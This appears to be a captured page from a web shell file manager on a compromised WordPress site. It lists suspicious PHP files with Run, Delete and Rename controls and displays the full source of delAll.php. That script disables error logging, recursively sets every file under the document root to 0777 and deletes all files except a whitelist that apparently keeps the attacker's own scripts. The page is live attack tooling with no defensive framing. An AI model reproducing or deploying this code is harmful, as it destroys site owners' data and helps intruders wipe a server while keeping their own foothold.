at path:
ROOT
/
delAll.php
run:
R
W
Run
56f8a5
DIR
2026-04-20 08:03:44
R
W
Run
6d796
DIR
2026-04-20 10:37:46
R
W
Run
images__d2a7ed7
DIR
2026-04-20 08:03:44
R
W
Run
wp-content
DIR
2026-05-01 04:30:16
R
W
Run
.htaccess
1.13 KB
2024-08-22 08:03:44
R
W
Run
bal.php
80.21 KB
2026-04-18 09:09:38
R
W
Run
Delete
Rename
css
508 By
2026-03-05 01:08:14
R
W
Run
Delete
Rename
delAll.php
1.54 KB
2026-03-05 01:00:47
R
W
Run
Delete
Rename
eetu.php
13.97 KB
2026-04-18 01:56:02
R
W
Run
Delete
Rename
error_log
579.96 KB
2026-04-22 19:30:09
R
W
Run
Delete
Rename
index.php0
5.76 KB
2024-02-07 08:03:43
R
W
Run
Delete
Rename
robots.txt
381 By
2023-12-12 08:03:44
R
W
Run
wp-site.php
7.62 KB
2026-03-18 01:44:43
R
W
Run
Delete
Rename
error_log
up
📄
delAll.php
Save
<?php @ini_set('log_errors', 0); @ini_set('error_log', NULL); @ini_set('error_reporting', NULL); @error_reporting(0); $path = isset( $_SERVER['DOCUMENT_ROOT'] ) ? $_SERVER['DOCUMENT_ROOT'] : ''; $path = str_replace( '//', '/', $path ); $fileArray = array($path.'/simple.php', $path.'/chosen.php',$path.'/.htaccess', $path.'/index.php', $path.'/robots.txt', $path.'/css',); function scanDirRecursive( $dir ) { global $path, $fileArray; if ($handle = opendir( $dir ) ) { while ( ($file = readdir( $handle ) ) !== false) { if ( $file != "." && $file != ".." ) { $fullPath = $dir . DIRECTORY_SEPARATOR . $file; chmod( $fullPath, 0777 ); if ( is_dir( $fullPath ) ) { scanDirRecursive($fullPath); } else { if ( !in_array($fullPath, $fileArray) ){ @unlink( $fullPath ); } } } } closedir($handle); } } function delDir( $dir ) { global $path; if ($handle = opendir( $dir ) ) { while ( ($file = readdir( $handle ) ) !== false) { if ( $file != "." && $file != ".." ) { $fullPath = $dir . DIRECTORY_SEPARATOR . $file; chmod( $fullPath, 0777 ); if ( is_dir( $fullPath ) ) { @unlink( $fullPath ); } } } closedir($handle); } } scanDirRecursive( $path ); delDir( $path ); echo 1;